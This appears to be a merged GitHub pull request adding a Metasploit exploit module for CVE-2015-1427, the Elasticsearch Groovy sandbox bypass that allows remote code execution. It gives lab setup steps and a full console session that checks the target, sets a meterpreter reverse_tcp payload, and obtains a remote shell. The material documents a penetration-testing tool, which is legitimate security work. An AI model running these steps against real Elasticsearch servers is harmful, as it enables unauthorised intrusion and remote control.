Add module for CVE-2015-1427, elasticsearch groovy code injection #4907

merged 8 commits into from Mar 12, 2015


jvazquez-r7 commented Mar 10, 2015

This PR adds an msf module for CVE-2015-1427, an RCE in elasticsearch due to the groovy sandbox bypass discovered recently. It also improves the old script_mvel_rce check to avoid false positives.

This module has been tested with Elastic 1.4.2 on Ubuntu 12.04 server (32 bits) and Windows.


  • Install Ubuntu 12.04 server (32 bits)
  • Install openjdk jdk 7: `sudo apt-get install openjdk-7-jdk`
  • Install Elastic search 1.4.2, it can be downloaded from its homepage.
  • Execute elasticsearch: `bin\elasticsearch`
  • Create one index:

    ```
    juan@ubuntu:~$ curl -XPUT 'http://localhost:9200/twitter/'
    ```

  • Add at least one document to the index:

    ```
    curl -XPUT 'http://localhost:9200/twitter/tweet/1' -d '{
    > "user" : "kimchy",
    > "post_date" : "2009-11-15T14:12:12",
    > "message" : "trying out Elasticsearch"
    > }'
    ```
  • Run the module, hopefully enjoy sessions:

    ```
    msf > use exploit/multi/elasticsearch/search_groovy_script
    msf exploit(search_groovy_script) > set RHOST
    msf exploit(search_groovy_script) > check
    [+] - The target is vulnerable.
    msf exploit(search_groovy_script) > set payload java/meterpreter/reverse_tcp
    payload => java/meterpreter/reverse_tcp
    msf exploit(search_groovy_script) > set lhost
    lhost =>
    msf exploit(search_groovy_script) > rexploit
    [*] Reloading module...

    [*] Started reverse handler on
    [*] - Checking vulnerability...
    [*] - Discovering TEMP path...
    [+] - TEMP path on '/tmp'
    [*] - Discovering remote OS...
    [+] - Remote OS is 'Linux'
    [*] - Trying to load metasploit payload...
    [*] Sending stage (30680 bytes) to
    [+] Deleted /tmp/EmGWzsL.jar

    meterpreter > getuid
    Server username: juan
    meterpreter > sysinfo
    Computer    : ubuntu
    OS          : Linux 3.8.0-29-generic (i386)
    Meterpreter : java/java
    meterpreter >
    ```

carnal0wnage commented on 9e17874 Mar 11, 2015

<3 this

jvazquez-r7 commented Mar 11, 2015

Thanks @carnal0wnage :-) I'm glad you think it's useful!

@wchen-r7 wchen-r7 self-assigned this Mar 12, 2015

@wchen-r7 wchen-r7 merged commit 8a452a7 into rapid7:master Mar 12, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

wchen-r7 added a commit that referenced this pull request Mar 12, 2015